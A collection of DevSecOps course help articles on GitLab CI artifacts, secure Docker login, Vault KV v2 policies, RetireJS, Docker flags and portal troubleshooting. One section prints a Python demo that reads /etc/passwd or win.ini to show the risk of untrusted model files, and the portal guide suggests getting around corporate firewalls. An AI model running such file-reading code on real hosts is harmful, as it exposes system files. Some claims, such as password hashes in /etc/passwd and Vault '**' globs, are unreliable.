Behaviors. Jenkins will then create a separate job for each tag. | | Can I run the same pipeline on both Jenkins and GitHub Actions? | Yes – keep the core logic (e.g., Docker commands) in reusable scripts stored in the repo, then invoke them from either platform’s YAML or Jenkinsfile. | | What if a security tool returns a non‑JSON output? | Convert it to JSON (or JUnit XML) before uploading to DefectDojo. Most tools provide a -f json flag; otherwise use a small wrapper script. | | Is continue-on-error safe for production releases? | Use it only for diagnostic or reporting steps. Critical build steps (e.g., artifact publishing) should still fail the workflow if they encounter errors. | Conclusion By correctly propagating Git tag information into Jenkins, you gain precise version control over releases. Building an enterprise‑grade pipeline that integrates SCA, SAST, and DAST ensures comprehensive security coverage while remaining modular and scalable. Finally, mastering failure‑allowance patterns in GitHub Actions lets you collect valuable security data without blocking downstream processes. Apply these patterns to your own CI/CD environment, and you’ll have a robust, compliant, and transparent DevSecOps workflow ready for enterprise adoption.

Last updated on Jan 07, 2026

GitLab CI/CD: Understanding Artifacts, the Package Registry, and YAML Configuration

GitLab CI/CD: Understanding Artifacts, the Package Registry, and YAML Configuration Introduction GitLab’s integrated CI/CD platform provides powerful tools for automating builds, tests, and deployments. Two features that often cause confusion are Artifacts and the Package Registry. While both deal with files produced during a pipeline, they serve distinct purposes. This article explains the difference between them, walks through the basics of the Package Registry, clarifies the when: always keyword, and offers practical guidance on when and how to create your .gitlab-ci.yml file. By the end, you’ll know how to store temporary build outputs, publish reusable packages, and configure your pipelines with confidence. 1. Artifacts vs. Package Registry | Aspect | Artifacts | Package Registry | |--------|---------------|----------------------| | Purpose | Temporary files generated by a pipeline (e.g., compiled binaries, test reports). | Permanent storage for reusable packages (Docker images, Maven, npm, PyPI, etc.). | | Lifecycle | Usually retained for a limited time (default 7 days) and can be automatically expired. | Persist until you delete them; they act as a versioned dependency store. | | Typical Use‑Cases | • Pass build output from one job to the next.• Provide downloadable logs or coverage reports.• Keep artifacts for debugging failed jobs. | • Host Docker images for deployment.• Publish internal npm modules.• Share Maven artifacts across micro‑services. | | Access | Downloaded via the pipeline UI or via API using the job ID. | Pulled with standard package managers (docker pull, npm install, mvn dependency:get, etc.). | | Configuration Location | Inside a job’s artifacts: block in .gitlab-ci.yml. | Defined by enabling the appropriate Package Registry feature in the project settings and publishing from a job. | Quick Example # .gitlab-ci.yml build: stage: build script: - make compile artifacts: paths: - build/*.jar # <-- temporary build output expire_in: 1 day publish: stage: deploy script: - docker build -t registry.example.com/myapp:$CI_COMMIT_SHA . - docker push registry.example.com/myapp:$CI_COMMIT_SHA # No artifacts block – the Docker image lives in the Package Registry In the snippet above, build creates a JAR file that is stored as an artifact for later jobs. The publish job pushes a Docker image to the Package Registry, where it can be pulled by any downstream environment. 2. What Is the GitLab Package Registry? The GitLab Package Registry is a unified, self‑hosted repository for a variety of package formats: - Docker (container images) - Maven (Java libraries) - npm (Node.js modules) - RubyGems, Python (PyPI), Conan, Helm, and more Key Benefits 1. Single Source of Truth – Store all your binaries and libraries alongside the source code. 2. Access Control – Leverage GitLab’s permission model to restrict who can publish or download packages. 3. Dependency Management – Use standard tooling (docker, mvn, npm) without external registries. 4. Traceability – Packages are linked to commits, tags, and pipeline IDs, making audits straightforward. Publishing a Package (Docker Example) # .gitlab-ci.yml docker_build: stage: build image: docker:latest services: - docker:dind script: - docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" $CI_REGISTRY - docker build -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA . - docker push $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA After the pipeline runs, the image appears under Packages & Registries → Container Registry in the project UI. 3. The when: always Keyword in Artifacts Inside the artifacts: Block test: stage: test script: npm test artifacts: when: always # <-- always upload artifacts paths: - coverage/ - Effect: The job will upload the specified paths even if the job fails. - Why use it? To retain logs, screenshots, or coverage reports that help debug failures. Outside the artifacts: Block (Job‑Level when) cleanup: stage: cleanup script: ./scripts/cleanup.sh when: always # <-- job runs regardless of previous job status - Effect: The job itself executes no matter whether earlier jobs succeeded or failed. - Typical use‑case: Clean‑up steps, notifications, or publishing artifacts after a failure. 4. When to Create and Run .gitlab-ci.yml 1. Early Planning (Recommended) - Add a minimal .gitlab-ci.yml at the start of the project to enable CI/CD from day one. - Example: a simple lint job that runs on every push. 2. Late Addition - You can add the file later, but remember that pipelines only start after the file exists in the repository. - If you need to avoid automatic deployments on the first run, use rules or only/except to limit execution. 3. Avoiding Unintended Deployments deploy: stage: deploy script: ./deploy.sh rules: - if: $CI_COMMIT_BRANCH == "main" when: manual # <-- requires manual trigger - The rules: block ensures the deployment only runs manually on the main branch, preventing accidental pushes from triggering a production rollout. 5. Practical Tips & Common Questions Tips - Set appropriate expiration for artifacts (expire_in:) to keep storage costs low. - Version your packages using semantic versioning; GitLab automatically adds the version tag to the registry. - Leverage caching (cache:) for dependencies that don’t need to be stored as artifacts. Common Questions | Question | Answer | |----------|--------| | Can I download an artifact from a failed job? | Yes—use when: always in the artifacts: block to ensure it’s uploaded even on failure. | | Do artifacts appear in the Package Registry? | No. Artifacts are pipeline‑specific; the Package Registry holds versioned packages meant for reuse across projects. | | Do I need a separate registry for each project? | Not necessarily. You can push to a shared group-level registry or use the project’s own registry; permissions are inherited from the group. | | How do I limit artifact size? | Use the paths: list to include only needed files and set expire_in: to control retention. | Conclusion Understanding the distinction between Artifacts (temporary pipeline outputs) and the Package Registry (persistent, versioned packages) is essential for building efficient GitLab CI/CD pipelines. Use when: always wisely to capture valuable debugging information, and decide early whether to add your .gitlab-ci.yml file to enable continuous integration from the start. With these concepts in hand, you can streamline builds, share reusable components, and maintain clean, maintainable pipelines across your organization.

Last updated on Jan 06, 2026

Secure Docker Login and CI/CD Script Syntax in GitLab Pipelines

Secure Docker Login and CI/CD Script Syntax in GitLab Pipelines Introduction When you automate container builds and deployments with GitLab CI/CD, handling credentials safely is essential. A common pattern—echo $CI_REGISTRY_PASSWORD | docker login -u $CI_REGISTRY_USER --password-stdin $CI_REGISTRY—illustrates three best‑practice concepts: 1. Passing secrets via --password-stdin instead of the insecure -p flag. 2. Using a here‑document (<<EOF) to feed a block of commands to ssh. 3. Leveraging echo and the pipe (|) to stream the password into Docker. This article breaks down each piece, explains why it matters, and shows a complete, production‑ready example you can copy into your own .gitlab-ci.yml file. 1. Why Prefer --password-stdin Over -p The security problem with -p docker login -u myuser -p mysecret registry.example.com - The password becomes part of the process command line. - Anyone with access to the host can see it with tools like ps aux or /proc/<pid>/cmdline. - The value may also be captured in shell history or CI job logs if the runner echoes the command. How --password-stdin mitigates the risk echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" - The password is read from standard input, never appearing in the command line. - It is not stored in the runner’s process table, reducing exposure to other users. - The secret is still protected by GitLab’s built‑in masked variable feature, which prevents it from being printed in job logs. Quick comparison | Feature | -p (plain) | --password-stdin | |---------|--------------|--------------------| | Visibility in ps | ✅ Yes | ❌ No | | Stored in shell history | ✅ Yes | ❌ No | | Works with masked CI variables | ❌ May leak | ✅ Safe | | Recommended by Docker docs | ❌ No | ✅ Yes | 2. Understanding the EOF (Here‑Document) Syntax What is a here‑document? A here‑document is a way to embed a multi‑line string directly in a shell script. The syntax looks like: ssh user@host <<EOF docker pull "$CI_REGISTRY/image:latest" docker stop myapp || true docker rm myapp || true docker run -d --name myapp "$CI_REGISTRY/image:latest" EOF - <<EOF tells the shell: “Everything that follows, up to a line that contains only EOF, should be fed to the preceding command’s standard input.” - The delimiter (EOF, EOT, END, etc.) can be any word you choose, as long as it matches the closing line. Why use it with ssh? - Readability – You can write a full series of commands without escaping quotes or line‑breaks. - Atomic execution – The remote shell receives the entire block as one script, reducing the risk of partial execution. - No intermediate files – The commands are streamed directly, avoiding temporary scripts on the remote host. Example in a GitLab CI job deploy_production: stage: deploy image: alpine:latest script: - | echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" - | ssh deploy@prod.example.com <<'EOF' set -e docker pull "$CI_REGISTRY/image:${CI_COMMIT_SHA}" docker stop web || true docker rm web || true docker run -d --name web -p 80:80 "$CI_REGISTRY/image:${CI_COMMIT_SHA}" EOF Notice the single‑quoted <<'EOF' – this prevents variable expansion on the local machine, letting the remote side handle its own environment variables. 3. The Role of echo and the Pipe (|) How the pipeline works echo "$CI_REGISTRY_PASSWORD" | docker login ... --password-stdin 1. echo outputs the password (as a single line) to its standard output. 2. The pipe (|) redirects that output to the standard input of docker login. 3. Docker reads the password from stdin, authenticates, and then discards the input. Why not just write the password in the command? - Directly embedding the password (-p "$CI_REGISTRY_PASSWORD") would expose it in the process list. - Using echo + pipe keeps the secret out of the command line while still allowing a one‑liner that fits neatly into a GitLab CI script: array. Alternative syntax (for completeness) script: - docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" <<<"$CI_REGISTRY_PASSWORD" The <<< here‑string does the same thing as echo … |, but echo | is more universally understood across POSIX shells. 4. Putting It All Together – A Full CI/CD Example stages: - build - push - deploy variables: IMAGE: "$CI_REGISTRY_IMAGE:$CI_COMMIT_SHORT_SHA" build: stage: build image: docker:latest services: [docker:dind] script: - docker build -t "$IMAGE" . push: stage: push image: docker:latest services: [docker:dind] script: - echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" - docker push "$IMAGE" deploy: stage: deploy image: alpine:latest script: - | ssh deploy@prod.example.com <<'EOF' set -e docker pull "$IMAGE" docker stop app || true docker rm app || true docker run -d --name app -p 80:80 "$IMAGE" EOF - This pipeline builds an image, pushes it securely, and then deploys it on a remote host using a clean, readable here‑document. Common Questions | Question | Answer | |----------|--------| | Do masked variables still appear in job logs? | No. GitLab masks them (replaces with *****) when they would otherwise be printed. | | Can I use -p if I run the pipeline on a private runner? | Technically possible, but Docker recommends --password-stdin for any environment where other users could inspect processes. | | What if my password contains newlines? | Use a masked variable that does not contain newlines, or store the credential in a Docker config file instead. | | Is EOF case‑sensitive? | Yes. The opening delimiter must match the closing one exactly (EOF, eof, END, etc.). | | Do I need to escape $ inside the here‑document? | If you want the remote host to expand the variable, leave it unescaped. Use a single‑quoted delimiter (<<'EOF') to prevent local expansion. | Tips for Secure CI/CD Pipelines 1. Always mask secret variables in GitLab (Settings > CI/CD > Variables). 2. Prefer --password-stdin for any Docker authentication. 3. Limit SSH access – use key‑based auth, restrict the key to the required commands, and consider using a bastion host. 4. Enable job timeout and resource limits on runners to avoid runaway processes. 5. Audit your .gitlab-ci.yml for accidental exposure of secrets (e.g., stray echo $SECRET without piping). Summary Secure Docker login, clean multi‑line remote execution, and proper use of shell pipelines are foundational skills for reliable GitLab CI/CD pipelines. By: - Passing passwords via --password-stdin, - Embedding remote command blocks with a here‑document (<<EOF), and - Streaming secrets with echo … |, you protect credentials, improve script readability, and keep your deployment process both safe and maintainable. Apply these patterns today and enjoy a smoother, more secure DevSecOps workflow.

Last updated on Jan 06, 2026

Troubleshooting Portal Access on Personal and Corporate Networks

Troubleshooting Portal Access on Personal and Corporate Networks If you’re enrolled in a DevSecOps course and the learning portal won’t load, the problem is often tied to the network you’re using rather than the platform itself. This guide walks you through the most common causes—and provides step‑by‑step solutions—for both personal devices on home networks and corporate devices on corporate networks. Why Your Portal Might Not Load | Situation | Typical Cause | Quick Indicator | |-----------|---------------|-----------------| | Personal device (home or public Wi‑Fi) | ISP or local network blocks Cloudflare, the CDN that powers our portal | Portal stays on “Loading…” for more than 30 seconds | | Company device or corporate network | Strict corporate firewalls, proxy settings, or cookie policies | Same “Loading…” message, but other internal sites work fine | | Both environments | Outdated browser, disabled JavaScript, or corrupted cache | Error appears in the browser console (F12) | Understanding which environment you’re in helps you choose the right troubleshooting path. Scenario 1 – Personal Device on a Home or Public Network 1. Verify the Issue is Network‑Related 1. Open a different website (e.g., https://www.google.com). 2. If other sites load normally, the problem is likely specific to the portal’s CDN. 2. Test with a VPN Most ISPs that block Cloudflare do so unintentionally. A VPN routes your traffic through a server that isn’t subject to those restrictions. Steps: 1. Choose a reputable VPN (e.g., NordVPN, ExpressVPN, or a free option with a solid privacy policy). 2. Connect to a server in a region where the portal is known to work (e.g., United States, Europe). 3. Reload the portal and see if it loads within a few seconds. - If it works: Your ISP or local network is blocking Cloudflare. Consider contacting your ISP for a permanent fix or continue using the VPN for course work. - If it still doesn’t work: Move on to the next troubleshooting step. 3. Clear Browser Cache & Cookies 1. Press Ctrl + Shift + Delete (Windows) or Cmd + Shift + Delete (Mac). 2. Select All time → Cache and Cookies → Clear data. 3. Restart the browser and try again. 4. Update or Switch Browsers - Ensure you’re using the latest version of Chrome, Edge, Firefox, or Safari. - If the problem persists, try a different browser to rule out a client‑side issue. 5. Contact Support (if needed) If none of the above resolves the issue, gather the following information before reaching out: - Browser name & version - VPN provider (if used) and server location - Screenshot of the “Loading…” screen - Any error messages from the browser console (press F12 → Console) Scenario 2 – Company Device or Corporate Network Corporate environments often enforce strict security policies that can interfere with external learning platforms. 1. Switch to a Personal Internet Connection - Mobile hotspot: Enable the hotspot on your smartphone and connect your laptop. - Home Wi‑Fi: If you’re working remotely, try your home network. If the portal loads on a personal connection, the corporate network is the blocker. 2. Use a Personal Device If you cannot change the network, try accessing the portal from a personal laptop or tablet that isn’t managed by the company’s IT policies. 3. Adjust Browser Cookie Settings (When Using a Company Device) Some enterprises force third‑party cookie restrictions that prevent the portal from storing session data. How to enable necessary cookies (Chrome example): 1. Click the lock icon next to the URL → Cookies. 2. Look for any entries marked Blocked for the portal domain. 3. Change the status to Allowed and reload the page. Tip: If your organization uses a custom proxy or web filter, you may need to add the portal’s domain (*.yourlearningplatform.com) to the proxy’s whitelist. Contact your IT department for assistance. 4. Disable Browser Extensions That May Interfere - Ad blockers, privacy shields, or security extensions can unintentionally block CDN resources. - Temporarily disable them, reload the portal, and see if it resolves the issue. 5. Request a Temporary Exception If the portal is essential for your certification, submit a formal request to your IT security team for a temporary exception or a “split‑tunnel” VPN that routes only the portal traffic outside the corporate firewall. Common Questions & Quick Tips | Question | Answer | |----------|--------| | Why does a VPN sometimes make the portal slower? | VPNs add extra hops; choose a server geographically close to the portal’s origin for optimal speed. | | Can I use my company’s VPN instead of a personal one? | Only if the corporate VPN does not route traffic through the same restrictive firewall. Test it first. | | Do I need to clear DNS cache? | Rarely, but if you suspect DNS poisoning, run ipconfig /flushdns (Windows) or dscacheutil -flushcache (macOS). | | Will disabling corporate cookies affect my work apps? | Only for the portal’s domain. Other corporate sites remain unaffected. | | Is there a mobile app for the portal? | Yes—download the official app from the App Store or Google Play for a smoother experience on mobile data. | Final Checklist - [ ] Test portal on a different network (mobile hotspot or VPN). - [ ] Clear browser cache, cookies, and disable interfering extensions. - [ ] Verify that your browser is up‑to‑date. - [ ] Adjust corporate cookie settings or request an IT exception if needed. - [ ] Document error details before contacting support. By following these steps, most learners can quickly regain access to the DevSecOps learning portal, whether they’re studying from home, a coffee shop, or the office. Happy learning!

Last updated on Jan 06, 2026

Understanding the `/data` Segment in HashiCorp Vault Policy Paths (KV v2)

Understanding the /data Segment in HashiCorp Vault Policy Paths (KV v2) Introduction When working with HashiCorp Vault’s key‑value (KV) secrets engine, you’ll often see the term /data appear in policy definitions but not when you read or write a secret via the API or CLI. This apparent inconsistency can be confusing for newcomers to Vault, especially when configuring ACL policies for the KV version 2 (KV v2) secrets engine. In this article we’ll explain why the /data prefix is required in policy paths, how KV v2 stores secrets internally, and how to write policies that correctly grant access without causing permission errors. Real‑world examples and a quick FAQ will help you apply the concepts to your own Vault deployments. 1. KV v2 vs. KV v1 – What Changed? | Feature | KV v1 | KV v2 | |---------|-------|-------| | Versioning | No version history | Full versioning of each secret | | Data layout | Simple key/value store | Separate metadata and data endpoints | | API paths | secret/<path> | secret/data/<path> (read/write) and secret/metadata/<path> (metadata) | | Policy paths | secret/* | secret/data/* (data) and secret/metadata/* (metadata) | KV v2 introduces versioned secrets, which means Vault must distinguish between the data of a secret (the actual key/value pairs) and the metadata (creation time, version numbers, deletion status, etc.). To keep this separation clean, the engine mounts two logical sub‑paths: - /data – used for reading and writing the secret’s payload. - /metadata – used for operations that affect the secret’s version history (e.g., delete, destroy, list). Because policies are evaluated before the request reaches the engine, the policy path must match the exact internal route Vault expects. That is why /data (or /metadata) appears in ACL rules even though the CLI or API shortcuts hide it from the user. 2. How Policies Are Evaluated 1. Client request – The user issues vault kv get secret/foo. 2. Vault routing – Internally the KV v2 engine rewrites the request to secret/data/foo. 3. ACL check – Vault looks for a policy rule that matches the rewritten path (secret/data/foo). 4. Decision – If a rule permits the operation, Vault proceeds; otherwise it returns a permission error. Because step 2 happens before the ACL check, your policy must reference the rewritten path (/data), not the user‑facing shortcut. 3. Writing Correct Policy Paths 3.1 Basic Read‑Only Policy # Allow reading any secret under the "app" namespace path "secret/data/app/*" { capabilities = ["read", "list"] } Note: No metadata capability is needed for simple reads, so we omit secret/metadata/app/*. 3.2 Full‑Control Policy (Read, Write, Delete) # Full CRUD on the "prod" namespace path "secret/data/prod/*" { capabilities = ["create", "read", "update", "delete", "list"] } path "secret/metadata/prod/*" { capabilities = ["delete", "destroy", "list"] } Explanation - create, update, delete apply to the data endpoint. - delete and destroy on the metadata endpoint let you remove specific versions or permanently erase a secret. 3.3 Using Wildcards Wisely - * matches a single path segment. - ** (double‑asterisk) matches any number of nested segments (available in Vault 1.9+). Example for a deep hierarchy: path "secret/data/team/**" { capabilities = ["read", "list"] } 4. Practical Example: Lab Scenario Scenario: A CI/CD pipeline needs to read the database credentials stored at secret/data/cicd/db. It must not be able to modify or delete them. Policy: path "secret/data/cicd/db" { capabilities = ["read"] } CLI usage (no /data needed): # The user runs this command vault kv get cicd/db # Internally Vault maps to secret/data/cicd/db and matches the policy above. If the same policy mistakenly omitted /data: # Incorrect policy – will never match path "secret/cicd/db" { capabilities = ["read"] } The pipeline would receive a permission denied error because the ACL engine never sees a matching rule. 5. Common Questions & Tips Q1: Do I need /metadata in every policy? A: Only when you intend to manage secret versions (e.g., delete specific versions, destroy a secret, or list version history). For simple read/write operations, /metadata is unnecessary. Q2: Can I hide /data from the policy by using a wrapper script? A: No. ACL evaluation happens before any client‑side logic. The policy must reflect the internal path structure. Q3: What happens if I mount the KV engine at a custom path? A: Replace secret with your mount point. For a mount at kv2, the policy path becomes kv2/data/... and kv2/metadata/.... Q4: Is /data required for KV v1? A: No. KV v1 does not have separate data/metadata endpoints, so the policy path is simply secret/*. Tips for Writing Clean Policies - Group related paths using a single block with a wildcard (* or **). - Separate data and metadata rules to follow the principle of least privilege. - Document the mount point in your policy comments to avoid confusion when the engine is remounted. - Test policies with vault policy read <name> and vault read sys/policy/<name> before applying them to production. 6. Quick Reference Cheat Sheet | Action | API/CLI (user) | Internal path | Policy path needed | |--------|----------------|---------------|--------------------| | Read secret | vault kv get <path> | secret/data/<path> | secret/data/<path> | | Write secret | vault kv put <path> key=val | secret/data/<path> | secret/data/<path> | | List secrets | vault kv list <path> | secret/data/<path> (list) | secret/data/<path> | | Delete version | vault kv delete -versions=2 <path> | secret/metadata/<path> | secret/metadata/<path> | | Destroy secret | vault kv destroy -versions=2 <path> | secret/metadata/<path> | secret/metadata/<path> | Conclusion The /data segment in HashiCorp Vault policy paths is not an optional convenience—it is a required part of the internal routing for KV v2. Understanding that policies are evaluated against the rewritten request path explains why you include /data (and optionally /metadata) in ACL rules, while the same segment is omitted from everyday read/write commands. By aligning your policies with Vault’s internal structure, you avoid permission errors and enforce the principle of least privilege across your secret management workflows. For more details, refer to the official documentation: https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2#acl-rules.

Last updated on Jan 07, 2026

Technical Tips for DevSecOps Labs: RetireJS Ignore Files, Docker Cleanup, LLM Output, and Executable‑Code Examples

Technical Tips for DevSecOps Labs: RetireJS Ignore Files, Docker Cleanup, LLM Output, and Executable‑Code Examples In DevSecOps training you’ll encounter a variety of hands‑on labs that involve security scanning, container management, and large‑language‑model (LLM) interactions. While the concepts are straightforward, the day‑to‑day details—like creating a .retireignore.json file, cleaning up Docker images, or interpreting LLM output—can be confusing for learners. This article consolidates the most common technical questions and provides step‑by‑step guidance, practical examples, and best‑practice tips to keep your lab environment tidy and your results reliable. 1. Managing False Positives with RetireJS – Creating a .retireignore.json File 1.1 Why an Ignore File Is Needed RetireJS is a popular JavaScript library vulnerability scanner. During a scan it may flag known issues that you have already assessed as harmless (false positives). Adding those entries to a .retireignore.json file tells RetireJS to skip them on subsequent runs. 1.2 No Automatic Generator – Manual Entry Is Required RetireJS does not provide a built‑in command to generate the ignore file. You must copy the relevant details from the scan report yourself. The required JSON structure looks like this: { "ignore": [ { "component": "jquery", "version": "3.5.1", "identifiers": ["CVE-2020-11022"] }, { "component": "lodash", "version": "4.17.15", "identifiers": ["CVE-2021-23337"] } ] } 1.3 Step‑by‑Step Manual Process 1. Run the scan – retire --outputformat json > retire-report.json 2. Open the report – locate the false‑positive entry; note the component, version, and any identifiers (CVE, advisory URL, etc.). 3. Edit (or create) .retireignore.json in the project root. 4. Add an object for each false positive using the format above. 5. Save and re‑run the scan to confirm the issues are ignored. Tip: Keep the ignore file under version control so teammates know which findings have been deliberately excluded. 2. Improving Readability of LLM Output in the Lab Terminal 2.1 The Problem When you invoke the custom LLM built for the course, the generated text can wrap oddly or become truncated, making it hard to read. 2.2 Quick Fix – Resize the Terminal Pane - Drag the divider between the exercise instructions and the terminal window to make the terminal wider. - Increase the number of columns (e.g., from 80 to 120) by adjusting your terminal settings or using stty cols 120. 2.3 Additional Tips | Situation | Action | |-----------|--------| | Long JSON payloads | Pipe the output through a formatter: llm-cli … | jq . | | Colored output looks garbled | Disable ANSI colors: add --no-color to the command. | | Scrolling is required | Use less -R to paginate: llm-cli … | less -R. | 3. What Does “The Executable Code Can Read Any Operating System” Mean? 3.1 Concept Overview In the practice exam you may see a statement like “The executable code can read any operating system.” This is a shorthand for code that can access arbitrary files on the host OS, regardless of whether it runs on Linux, Windows, or macOS. 3.2 Simple Proof‑of‑Concept Example # malicious_payload.py – demonstration only import os def read_sensitive_file(): # Linux example if os.path.exists('/etc/passwd'): with open('/etc/passwd') as f: print(f.read()) # Windows example elif os.path.exists(r'C:\Windows\win.ini'): with open(r'C:\Windows\win.ini') as f: print(f.read()) read_sensitive_file() Running this script inside a vulnerable model file shows that the attacker can: - Read /etc/passwd on a Linux host (exposes user account hashes). - Read C:\Windows\win.ini on a Windows host (reveals system configuration). The takeaway: A malicious model file is not just a data leak; it can execute arbitrary commands and read any file the executing user can access. Always treat model files as untrusted code. 3.3 Mitigation Checklist - Run model files in a sandbox or isolated container. - Apply least‑privilege file system permissions for the execution user. - Use runtime monitoring (e.g., strace, auditd) to detect unexpected file reads. 4. Docker Cleanup: Why Use docker rmi After --rm? 4.1 Understanding the Two Commands | Command | What It Removes | When It Executes | |---------|----------------|------------------| | docker run --rm … | Container – the runtime instance (filesystem, network stack). | Automatically at container exit. | | docker rmi <image> | Image – the read‑only layers stored on disk. | Must be run manually (or scripted). | 4.2 Why Both Are Important in CI/CD 1. Prevent Container Bloat – --rm ensures that stopped containers don’t accumulate in docker ps -a. 2. Free Disk Space – Docker images can be several gigabytes. Removing them with docker rmi reclaims space, which is crucial for shared runners or low‑cost cloud VMs. 3. Guarantee Fresh Pulls – Deleting the image forces the next pipeline run to pull the latest version, avoiding stale layers that could hide new vulnerabilities. 4.3 Example Cleanup Script for a Pipeline # Build and run the test container docker build -t myapp:test . docker run --rm myapp:test # Clean up the image after the job finishes docker rmi myapp:test || echo "Image already removed" Tip: Add docker system prune -f at the end of a long‑running pipeline to remove dangling volumes, networks, and build cache in one go. Common Questions & Quick Tips Q1: Can I generate a .retireignore.json automatically with a script? A: You can write a custom script that parses retire-report.json and outputs the ignore format, but RetireJS itself does not provide this feature. Ensure any automation is reviewed before committing the file. Q2: My LLM output still looks broken after resizing the terminal. A: Try redirecting the output to a file (llm-cli … > output.txt) and open it with a text editor that handles line wrapping. Q3: Is it safe to run untrusted model files on my local machine? A: No. Always execute them inside an isolated Docker container or a virtual machine with restricted permissions. Q4: Do I need to run docker rmi on every CI/CD run? A: Not always. In long‑lived build agents, periodic cleanup (e.g., nightly) is sufficient. In ephemeral runners, the container image disappears with the VM, so explicit docker rmi is optional but harmless. Bottom Line - RetireJS ignore files must be edited manually; keep them version‑controlled. - LLM terminal readability improves with pane resizing, pagination, and formatting tools. - Executable‑code examples illustrate how malicious models can read any OS file—use sandboxing to mitigate. - Docker cleanup using both --rm and docker rmi ensures a clean, low‑storage CI/CD environment. Apply these tips in your labs to reduce friction, keep your environments tidy, and focus on mastering DevSecOps concepts rather than troubleshooting avoidable issues. Happy coding!

Last updated on Jan 07, 2026

Docker User Flags and Environment Variables for Security Tools: When and Why to Use Them

Docker User Flags and Environment Variables for Security Tools: When and Why to Use Them In DevSecOps labs you’ll often run security scanners (Retire.js, Safety, Renovate, Semgrep, TruffleHog) inside Docker containers. A common source of confusion is the use of the --user $(id -u):$(id -g) flag and environment‑variable configuration. This article explains when the user flag is required, how to configure Renovate for different platforms, login requirements for Semgrep, and the role of TruffleHog’s --filesystem --directory option. By the end you’ll know how to run each tool securely and without unnecessary permission problems. 1. Understanding the Docker --user Flag 1.1 What does --user $(id -u):$(id -g) do? - Sets UID/GID – The container runs with the same user and group IDs as the host user who invoked Docker. - Prevents root‑owned files – Files created inside the mounted volume keep the host user’s ownership, avoiding permission headaches later. - Implements least‑privilege – The container does not run as root unless the image explicitly requires it. 1.2 When is the flag necessary? | Scenario | Reason to use --user | |----------|------------------------| | Mounting host source code (e.g., -v $(pwd):/src) | The scanner writes temporary files or caches; you want those files owned by your host user. | | Running on CI agents with non‑root users | Guarantees the container respects the CI runner’s security policy. | | Images that default to root but your policy forbids it | Override the default to comply with organizational guidelines. | 1.3 When can you omit the flag? - Tools that only read files and never create output (e.g., Retire.js, Safety) can safely run as the image’s default user, often root. - The image already defines a non‑root user that matches your needs. Key takeaway: Use the flag only when you need to control file ownership or enforce non‑root execution. It is optional for read‑only scans. 2. Configuring Renovate for GitHub vs. GitLab Renovate automates dependency updates. Its configuration differs between platforms because of how authentication and defaults are handled. 2.1 GitHub – Quick start with an environment variable 1. Set the token export RENOVATE_TOKEN=ghp_XXXXXXXXXXXXXXXXXXXX 2. Run Renovate docker run --rm -e RENOVATE_TOKEN hysnsec/renovate renovate USER/REPOSITORY - GitHub’s API accepts a personal access token passed via RENOVATE_TOKEN. - The CLI automatically infers the host (github.com) and the repository from the argument, so no extra config file is needed. 2.2 GitLab – Need a renovate.json (or config.js) file 1. Create a config file (e.g., renovate.json) with at least the platform definition: { "platform": "gitlab", "gitlabEndpoint": "https://gitlab.com/api/v4/", "token": "glpat-XXXXXXXXXXXXXXXXXXXX" } 2. Mount the file and run Renovate: docker run --rm -v $(pwd)/renovate.json:/usr/src/app/renovate.json \ -e RENOVATE_CONFIG_FILE=/usr/src/app/renovate.json \ hysnsec/renovate renovate GROUP/PROJECT - GitLab’s API requires the endpoint URL and often additional settings (e.g., self‑hosted instances). - Because the CLI cannot infer these details from a simple user/repo argument, a configuration file is mandatory. Why the difference? GitHub’s public SaaS API follows a predictable pattern, allowing Renovate to operate with minimal setup. GitLab, especially self‑hosted deployments, varies in URL and authentication, so a config file provides the necessary context. 3. Logging into Semgrep – Do Not Use the Root Account Semgrep’s hosted platform expects each user to authenticate with a personal GitHub or GitLab account that is linked to their Semgrep account. - Do not use the generic training credentials (root:pdso-training). - Avoid corporate GitHub/GitLab accounts because they may lack the required scopes or could expose internal repositories. Recommended login flow 1. Create a personal GitHub/GitLab account (if you don’t already have one). 2. Sign up for Semgrep Cloud and link the account. 3. Authenticate via the CLI: semgrep login --token <your-semgrep-token> 4. TruffleHog: Branch Targeting and the --filesystem --directory Flag TruffleHog can scan either Git histories or local filesystem content. 4.1 Scanning a specific branch (Git mode) docker run --rm -v $(pwd):/src hysnsec/trufflehog git \ --repo https://github.com/USER/REPO.git \ --branch develop - The --branch option tells TruffleHog which commit history to analyze. 4.2 Scanning a local directory (Filesystem mode) docker run --rm -v $(pwd):/src hysnsec/trufflehog filesystem \ --directory=/src - No --branch needed because you are scanning the current files, not Git history. 4.3 Role of the --user flag in the examples docker run --user $(id -u):$(id -g) -v $(pwd):/src --rm hysnsec/trufflehog filesystem --directory=/src - Adding --user simply runs the container under your host UID/GID, preventing root‑owned artifacts in /src. - Removing it runs the container as the image’s default user (often root). The scan still works; the only difference is file ownership of any temporary data. Bottom line: The --user flag is optional for TruffleHog unless you need to preserve file permissions on the host. 5. Common Questions & Tips | Question | Answer | |----------|--------| | Do I always need --user for Docker security tools? | No. Use it when the tool writes to a mounted volume or when your policy forbids root. | | Can Renovate work with GitLab without a config file? | Only if you use the hosted GitLab SaaS with default endpoints; otherwise a config file is required. | | What token scopes are needed for Renovate on GitHub? | repo (full control of private repos) and read:org if you work with organization resources. | | Is it safe to run Semgrep with my corporate GitHub account? | Not recommended. Use a personal account that you control and that has only the necessary repository access. | | Why does TruffleHog sometimes fail with permission errors? | The container may be running as root and creates files owned by root. Adding --user $(id -u):$(id -g) resolves this. | Quick tip: Always test a Docker command without --user first. If you see “permission denied” when the container writes to a host‑mounted directory, re‑run with the flag. 6. Summary - The Docker --user $(id -u):$(id -g) flag is optional and only required for write‑access scenarios or strict least‑privilege policies. - Renovate’s GitHub integration is streamlined via an environment variable, whereas GitLab needs a configuration file to specify endpoint and token details. - Semgrep login must use a personal GitHub/GitLab account; the generic root credentials are not valid. - TruffleHog’s --filesystem --directory mode scans local files and does not depend on the --user flag; the flag only influences file ownership on the host. By understanding these nuances, you can run security tools efficiently, keep your host environment clean, and stay compliant with best‑practice DevSecOps workflows.

Last updated on Jan 06, 2026

